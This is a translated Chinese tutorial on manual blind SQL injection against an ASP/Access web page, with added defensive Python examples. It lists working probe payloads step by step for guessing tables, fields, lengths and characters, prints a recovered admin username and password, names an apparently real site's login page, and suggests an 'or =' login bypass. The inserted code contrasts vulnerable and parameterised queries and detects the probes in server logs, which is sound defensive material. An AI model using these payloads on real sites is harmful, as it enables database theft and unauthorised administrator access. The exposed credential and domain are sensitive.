* **Injection basics** (mainly manual and basic, haha)
Example target: http://www.XXX.com/jiaren.asp?ID=544
Okay. Now we start.
1. Judgment
Append ;
Append and 1=1, then and 1=2
Judgment is the most important step: if you cannot tell whether the parameter is injectable, there is no way to continue with manual injection.
Returned:
Microsoft JET Database Engine error '80040e14'
Syntax error (missing operator) in query expression 'ID = 544'.
/jiaren.asp, line 15

; returns the normal page
and 1=1 returns the normal page
and 1=2 returns the error page, for example:
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/jiaren.asp, line 28
With the simple judgment above we know the page is injectable. Many friends ask at this point why that proves injection. Just remember: we judge by the difference between the returned pages. Only when the two returned pages differ can we tell that the injection point exists.
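To make the "difference between the returned pages" concrete from the defender's side, here is an added example that is not code from the original tutorial and not the jiaren.asp application. It uses an in-memory SQLite database as a stand-in for the Access back end; the table names jiaren and admin, their columns and rows are constructed. lookup_vulnerable pastes the ID parameter into the SQL text the way the classic ASP page does, while lookup_safe validates the type and binds the value as a parameter, so every probe from this section collapses onto the same error page and the oracle disappears.

```python
import sqlite3

# Constructed sample database standing in for the Access/JET back end
# (example data, not the original site's schema).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE jiaren (ID INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("CREATE TABLE admin (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO jiaren VALUES (?, ?)",
                     [(543, "post 543"), (544, "post 544"), (545, "post 545")])
    conn.execute("INSERT INTO admin VALUES (?, ?)", ("alice", "constructed-pw"))
    return conn


def lookup_vulnerable(conn, raw_id):
    """Mirrors the classic ASP pattern: the request parameter is concatenated
    straight into the SQL text, so whatever follows the number is executed."""
    sql = "SELECT title FROM jiaren WHERE ID = " + raw_id
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        # A malformed query (e.g. a table that does not exist) yields the
        # database error page, exactly the signal the tutorial reads.
        return "error page"
    # An empty result set is the BOF/EOF "error page" of the tutorial.
    return "normal page" if row else "error page"


def lookup_safe(conn, raw_id):
    """Hardened form: enforce the expected type first, then bind the value as a
    parameter so the database never sees it as SQL."""
    try:
        id_value = int(raw_id)  # raises for '544 and 1=1', '544;', ...
    except ValueError:
        return "error page"
    row = conn.execute("SELECT title FROM jiaren WHERE ID = ?", (id_value,)).fetchone()
    return "normal page" if row else "error page"


# The probes from section 1 and 2 of the tutorial (constructed inputs).
PROBES = [
    "544",
    "544 and 1=1",
    "544 and 1=2",
    "544 and 0<>(select count(*) from admin)",
    "544 and 0<>(select count(*) from user)",   # no such table -> SQL error
]


def run_probes():
    """Return {probe: (result of vulnerable lookup, result of safe lookup)}."""
    conn = build_db()
    return {p: (lookup_vulnerable(conn, p), lookup_safe(conn, p)) for p in PROBES}


if __name__ == "__main__":
    for probe, (vuln, safe) in run_probes().items():
        print(f"{probe!r:48} vulnerable={vuln:12} safe={safe}")
```

The vulnerable column reproduces the tutorial's oracle (normal/normal/error for the three judgment probes, and a true/false answer for the table-existence question). The safe column returns the same error page for every non-numeric value, so the two pages the attacker needs to compare are identical.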
2. Guess the table
and 0<>(select count(*) from *) --- the * stands for the table name you are guessing
This is the most basic query statement in the ordinary sense. I will explain what the statement does; for details please look up SQL query references.
and 0<>(select count(*) from admin) --- checks whether the admin table exists
Here admin can be changed. Do not change the other parts.
If the correct page comes back, the admin table exists. If the error page comes back, it does not, so we change the name to another one, for example and 0<>(select count(*) from user). Of course you can try any name you can think of. I gave two tips in class that day and didn't expect many people to know them; some also asked whether admin and user can be changed to something else. Comrades, admin and user can of course be replaced, but you are guessing a table name, so think about it: is there any point changing it to 123 or 456? No, because nobody names a table that.
Generally the table name is nothing more than admin, adminuser, user, pass, password ..
3. Guess the number of accounts
and 0<(select count(*) from admin)
This is similar to the preceding statement; the query part is in fact the same. The difference is the number in front, which is used to check the number of user accounts. Yes, it is not fixed at 1, because we are guessing: we do not know how many accounts the table holds, so we have to guess. If it were fixed, there would be nothing to guess.
1< means: check whether 1 is less than the number of accounts. If the correct page comes back, it is; if the error page comes back, it is not, and we move on to 2<, 3<, ..... You can also guess with 1>, 2>.
If 0< returns the correct page and 1< returns the error page, the number of accounts is pinned down to a specific value; working out which one is simple arithmetic, so I won't spell it out.
To show you: I start from 0, which is certain to return the correct page, since it is impossible to have no administrator account at all. 1< returns the error page, so there is only one administrator account. Change it to 1= and check whether it is OK: the correct page comes back, so yes.
If there are several accounts, you need to decide which account to guess.
4. Guess the field names
and 1=(select count(*) from admin where len(name)>0) --- user field name
and 1=(select count(*) from admin where len(password)>0) --- password field name
This guesses the names of the fields in the table.
and 1=(select count(*) from admin where len(*)>0) --- this is the core statement. All we need to do is put the field name we think of inside the len() brackets.
Let's first guess the username field. I used name and it was OK, right? So let's guess the password field.
I first tried pass and got the error page, so we switch to password and see that it is OK.
So we have guessed the user field and the password field. Below we guess the length and the specific characters.
5. Guess the length of each field
To guess the length:
and 1=(select count(*) from admin where len(*)>0)
Replace the 0 with other numbers; as long as the correct page comes back, keep going. OK, let's start.
First the account length. The account field is name.
and 1=(select count(*) from admin where len(name)>0)   Correct
and 1=(select count(*) from admin where len(name)>1)   Correct
and 1=(select count(*) from admin where len(name)>2)   Correct
and 1=(select count(*) from admin where len(name)>6)   Error
and 1=(select count(*) from admin where len(name)>5)   Correct
and 1=(select count(*) from admin where len(name)>4)   Correct
Then we know the length is 6.
and 1=(select count(*) from admin where len(name)=6)   Correct
Right: =6 returns the correct page.
Below is the length of the password field:
and 1=(select count(*) from admin where len(password)>0)    Correct
and 1=(select count(*) from admin where len(password)>6)    Correct
and 1=(select count(*) from admin where len(password)>10)   Correct
and 1=(select count(*) from admin where len(password)>15)   Error
and 1=(select count(*) from admin where len(password)>14)   Error
and 1=(select count(*) from admin where len(password)>13)   Error
and 1=(select count(*) from admin where len(password)>12)   Error
and 1=(select count(*) from admin where len(password)>11)   Correct
OK, the length is 12.
name: 6
password: 12
The specific characters are next.
6. Guess the characters
and 1=(select count(*) from admin where left(name,1)='a') --- guess the user name
and 1=(select count(*) from admin where left(password,1)='...') --- put the character to test between the quotes
In this way you add one character at a time until you have covered the number of characters you just guessed, and the account comes out.
and 1=(select count(*) from admin where left(pass,1)='a') --- guess the password
In left(name,1)='a', note that the 1 is the position of the character being guessed.
and 1=(select count(*) from admin where left(name,1)='a') --- guesses the first character of the user account
and 1=(select count(*) from admin where left(name,2)='AB') --- the second character of the user account
Keep guessing this way.
and 1=(select count(*) from admin where left(name,1)='a')   Error
.....
and 1=(select count(*) from admin where left(name,6)='pclzyq')
Because this guessing process is long, I will give the answer directly.
and 1=(select count(*) from admin where left(password,1)='a')   Error
.......
and 1=(select count(*) from admin where left(password,12)='pclzyq000215')
The answer, given directly:
name = pclzyq
password = pclzyq000215
7. Find the login page and log on
Common login pages:
admin.asp
admin_index.asp
admin/index.asp
admin/admin.asp
....
You can build up your own list. Don't forget to put it in a text file and send it to me.
Here the login page is at http://www.talewin.com/admin.asp.
Well, the back end is easy to write, and the login page probably has another problem too.
Try logging in with or = and see whether you have seen that one before.
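Every step above leaves the same trace in the web server log: a parameter that should be a plain number suddenly carries and 1=1, select count(*) from ..., len(...) or left(...), usually from one client, with the responses flipping between the normal page and the error page. The following added example (my code, not part of the original tutorial) runs that check over constructed common-log-format lines modelled on the probes in this page. The client addresses, timestamps, sizes and the assumption that the ADODB error page is served with HTTP status 500 are all made up for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format) modelled on the probes
# shown in this tutorial. Not captured from any real server.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /jiaren.asp?ID=544 HTTP/1.1" 200 2310',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /jiaren.asp?ID=544%20and%201=1 HTTP/1.1" 200 2310',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /jiaren.asp?ID=544%20and%201=2 HTTP/1.1" 500 812',
    '10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /jiaren.asp?ID=544%20and%200<>(select%20count(*)%20from%20admin) HTTP/1.1" 200 2310',
    '10.0.0.5 - - [01/Jan/2024:10:00:12 +0000] "GET /jiaren.asp?ID=544%20and%201=(select%20count(*)%20from%20admin%20where%20len(name)>5) HTTP/1.1" 200 2310',
    '10.0.0.7 - - [01/Jan/2024:10:01:00 +0000] "GET /jiaren.asp?ID=545 HTTP/1.1" 200 2290',
]

# client, method, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Signatures of the probe families used above: tautologies, count(*)
# subqueries, and the string functions used to measure and guess fields.
SIGNATURES = {
    "tautology": re.compile(r"\band\s+\d+\s*=\s*\d+\b"),
    "count_subquery": re.compile(r"\bselect\s+(?:top\s+\d+\s+)?count\s*\(\s*\*\s*\)\s+from\b"),
    "string_probe": re.compile(r"\b(?:len|left|mid|asc)\s*\("),
}


def inspect_line(line):
    """Parse one log line and tag the ID parameter with matching signatures."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, _method, target, status = m.groups()
    query = parse_qs(urlsplit(target).query)   # parse_qs percent-decodes values
    raw_id = query.get("ID", [""])[0]
    tags = [name for name, rx in SIGNATURES.items() if rx.search(raw_id.lower())]
    # ID is documented as numeric; anything else is worth a look on its own.
    if raw_id and not raw_id.strip().isdigit():
        tags.append("non_numeric_id")
    return {"client": client, "status": int(status), "id": raw_id, "tags": tags}


def find_probes(lines):
    """Return one finding per line whose ID parameter carries a signature."""
    findings = []
    for line in lines:
        rec = inspect_line(line)
        if rec and rec["tags"]:
            findings.append(rec)
    return findings


def summarize(findings):
    """Per client: number of probe requests and the status codes they produced.
    One client alternating 200/500 on the same script is the oracle pattern."""
    per_client = {}
    for f in findings:
        entry = per_client.setdefault(f["client"], {"probes": 0, "statuses": set()})
        entry["probes"] += 1
        entry["statuses"].add(f["status"])
    return per_client


if __name__ == "__main__":
    hits = find_probes(LOG_LINES)
    for h in hits:
        print(h["client"], h["status"], h["tags"], repr(h["id"]))
    print(summarize(hits))
```

Matching on the decoded parameter value rather than the raw URL matters: the same probe can arrive as %20, + or literal spaces, and parse_qs normalises all of them before the signatures are applied. The non_numeric_id tag is the cheapest and most robust rule of the set, because it does not depend on knowing the attacker's SQL vocabulary at all.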
Note (a short SQL glossary):
Command: SELECT
Meaning: select
Description: used to find the records that satisfy a condition
Aggregate function: COUNT
Meaning: count
Description: used to count the specified rows
Clause: FROM
Meaning: data table
Description: used to specify a data table
Clause: WHERE
Meaning: condition
Description: used to set conditions
Operator: AND
Meaning: and
Description: logical and
TOP -- take the first N rows
select top 10 * from .....
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- this query can be used to guess Chinese user names and passwords: replace the number after = with the code value of the Chinese character, and finally convert the result back to a character.